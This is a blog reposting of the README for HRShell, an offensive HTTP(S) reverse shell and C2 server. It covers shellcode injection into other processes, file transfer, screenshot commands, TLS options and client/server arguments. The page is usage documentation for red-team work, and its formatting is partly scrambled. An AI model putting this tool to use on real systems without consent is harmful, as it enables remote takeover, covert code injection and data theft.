HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.
It is an HTTPS/HTTP reverse shell built with flask. It’s compatible with python 3.x and has been successfully tested on:
Features:
migrate <PID>
) by specifying its PIDcd
command and variants).download/upload/screenshot
commands available.|
) & chained commands (;
) are supportedgunicorn
and Nginx
.server.py
and client.py
are easily extensible.Also Read – Router Exploit Shovel : Automated Application Generation for Stack Overflow Types on Wireless Routers
Details
TLS key
Server-side: Unless –http option is specified, by default server.py is HTTPS using on-the-fly certificates, since on-the-fly certificates are a built-in flask-feature. But if -s tornado option is specified in order to make the server use TLS, a –cert and a –key option must be specified like so:
python server.py -s tornado –cert /path/cert.pem –key /path/key.pem
Either “real” certificates can be used or another way to generate a cert/key pair is using openssl like so:
openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365
A cert/key pair can also be used with the flask-server:
python server.py –cert /path/cert.pem –key /path/key.pem
Note: If the server is using TLS, then by design the client can’t use
http://...
to connect to the server, but must explicitly usehttps
instead.
Client-side: By default client’s SSL verification is disabled, unless:
python client.py -s https://192.168.10.7:5000 –cert /path/cert.pem
CERT = “””
—–BEGIN CERTIFICATE—–
MIIBoDCCAUoCAQAwDQYJKoZIhvcNAQEEBQAwYzELMAkGA1UEBhMCQVUxEzARBgNV
BAgTClF1ZWVuc2xhbmQxGjAYBgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMSMwIQYD
VQQDExpTZXJ2ZXIgdGVzdCBjZXJ0ICg1MTIgYml0KTAeFw05NzA5MDkwMzQxMjZa
…
—–END CERTIFICATE—–
“””
In this case client.py will attempt to create a hidden .cert.pem file on the fly and will use that instead.
There are two “modes” of shellcode injection using the two following commands respectively:
migrate <PID>
: Using this command we can inject shellcode into the memory space of another process by specifying its PID. For now this command can only be applied at Windows x86/x64 platforms!2. inject shellcode
: Using this command a new thread of our current process is created and the shellcode injection occurs in its memory space. As a result our HTTP(S) shell is not affected by the injection. The platforms where this command can be applied are: Unix x86/x64, Windows x86 platforms!
Notes: In case the injection happens on a process, then process-permissions play a very important role. It’s not always possible to inject on any process due to lack of appropriate privileges.
There are two ways you can specify/set what type of shellcode you want the client to execute:
shellcode
variable on client.py
script to be a valid shellcode orset shellcode <shellcode-id>
command to do that on the fly. With this command you can update your shellcode on client-side from server-side as many times as you like! The first way is pretty straight forward. However in order to use the second and more convenient way (since you can also modify an already specified shellcode) you have to set shellcodes/utils.py
script such that it contains the shellcode(s) of your choise. The script contains an example of how you can do that.
You can modify/update
shellcodes/utils.py
script even after you’ve launchedserver.py
as many times as you want, sinceserver.py
will dynamically use the most updated/recent version. In this way you can set & modify shellcodes on the go…
Available commands: Special commands
Any other command is supported if it’s not interactive like e.g. gdb, top etc… Also by typing python server.py -h
or python client.py -h
you can get information the server and client available arguments.
Note: If a client is connected with the server and we want to terminate the server, before press CTRL+C, we have to close the connection using the exit
command.
Client-side:
In order to create a custom command, generally:
elif
statement also on client-side.Server-side:
If the command demands the existence of a new-endpoint on server-side, then:
@app.route(‘/custom_endpoint/’)
def custom_endpoint(arg):
“””
documentation if needed
“””
…
return …
@app.route(‘/’)
def handleGET():
…
return redirect(url_for(‘custom_endpoint’,
arg=…)
)
Script-Arguments
Both scripts (server.py and client.py) can be customized through arguments:
server.py
$ python server.py -h
usage: server.py [-h] [-s] [-c] [–host] [-p] [–http] [–cert] [–key]
server.py: An HTTP(S) reverse-shell server with advanced features.
arguments:
-h, –help show this help message and exit
-s , –server Specify the HTTP(S) server to use (default: flask).
-c , –client Accept connections only from the specified client/IP.
–host Specify the IP to use (default: 0.0.0.0).
-p , –port Specify a port to use (default: 5000).
–http Disable TLS and use HTTP instead.
–cert Specify a certificate to use (default: None).
–key Specify the corresponding private key to use (default: None).
client.py
$ python client.py -h
usage: client.py [-h] [-s] [-c] [-p]
client.py: An HTTP(S) client with advanced features.
arguments:
-h, –help show this help message and exit
-s , –server Specify an HTTP(S) server to connect to.
-c , –cert Specify a certificate to use.
-p , –proxy Specify a proxy to use [form: host:port]
Requirements:
To install the server-requirements:
pip install -r requirements.txt –upgrade –user
Disclaimer
This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software in general.
Credits : Seitz J. Gray Hat Python
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…